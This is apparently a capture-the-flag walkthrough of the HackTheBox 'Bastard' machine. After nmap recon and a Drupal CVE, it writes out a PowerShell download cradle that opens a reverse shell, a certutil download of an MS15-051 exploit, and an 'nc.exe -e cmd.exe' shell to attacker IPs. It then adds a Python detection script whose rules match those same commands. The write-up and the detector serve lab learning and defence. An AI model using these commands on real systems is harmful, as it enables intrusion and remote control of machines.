Bastard

Recon

$ nmap -p- -A 10.129.139.175
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-14 15:27 UTC
Nmap scan report for 10.129.139.175
Host is up (0.032s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Bastard | Bastard
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Drupal CMS welcomes us on port 80.

We can grab its version by going to /CHANGELOG.TXT.

Checking it against NIST, we can see that this version has a 9.8 Critical CVE.

We can then find a PoC for the exploit on GitHub.

We can get a reverse shell using Invoke-PowerShellTcp.ps1:

powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.66.152:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.66.152 -Port 4242

Privilege escalation

It’s a vanilla Windows Server 2008, so we can run an executable exploiting MS15-051.

We can send it over using http-server again, and fetch it on the target with certutil.exe -urlcache -split -f http://10.10.16.21/ms15-051x64.exe ms15-051x64.exe.

It works, so we can get a reverse shell with admin privileges by sending over nc and running .\ms15-051x64.exe "nc.exe -e cmd.exe 10.10.16.21 5555"
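From the defender's side, the file transfer and shell commands above are exactly the process command lines that endpoint telemetry should flag. The following is an added example, not part of the original writeup: three detection rules run over constructed Sysmon-style process-creation records (the "Image: ... | CommandLine: ..." layout and the image paths are assumptions; the command lines are the ones that appear on this page).

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry):
# one record per line, fields separated by " | ".
SAMPLE_EVENTS = [
    "Image: C:\\Windows\\System32\\certutil.exe | CommandLine: certutil.exe -urlcache -split -f http://10.10.16.21/ms15-051x64.exe ms15-051x64.exe",
    "Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | CommandLine: powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.66.152:8000/Invoke-PowerShellTcp.ps1')",
    "Image: C:\\Windows\\System32\\certutil.exe | CommandLine: certutil.exe -hashfile setup.msi SHA256",
    "Image: C:\\Users\\Public\\nc.exe | CommandLine: nc.exe -e cmd.exe 10.10.16.21 5555",
    "Image: C:\\Windows\\System32\\svchost.exe | CommandLine: svchost.exe -k netsvcs",
]

# Each rule is (name, regex over the command line). Case-insensitive, because
# Windows tooling accepts any casing of flags and cmdlet names.
RULES = [
    # certutil used as a downloader: -urlcache plus an http(s) URL
    ("certutil_url_download",
     re.compile(r"certutil(\.exe)?\s.*-urlcache\b.*\bhttps?://", re.I)),
    # PowerShell download cradle: IEX / Invoke-Expression over DownloadString()
    ("powershell_download_cradle",
     re.compile(r"(iex|invoke-expression)\b.*\.downloadstring\(", re.I)),
    # netcat handing a command interpreter to a remote peer
    ("netcat_exec_shell",
     re.compile(r"\bnc(at)?(\.exe)?\s.*-e\s+(cmd|powershell)(\.exe)?", re.I)),
]

def parse_event(line):
    """Split one record into a {field: value} dict."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value.strip()
    return fields

def match_rules(cmdline):
    """Names of every rule whose pattern matches the command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def detect(events):
    """Return (image, [rule names]) for each event that trips at least one rule."""
    hits = []
    for line in events:
        ev = parse_event(line)
        names = match_rules(ev.get("CommandLine", ""))
        if names:
            hits.append((ev.get("Image", "?"), names))
    return hits

if __name__ == "__main__":
    for image, names in detect(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(names)}")
```

The legitimate certutil -hashfile call is deliberately included to show that the rule keys on -urlcache plus a URL, not on certutil itself.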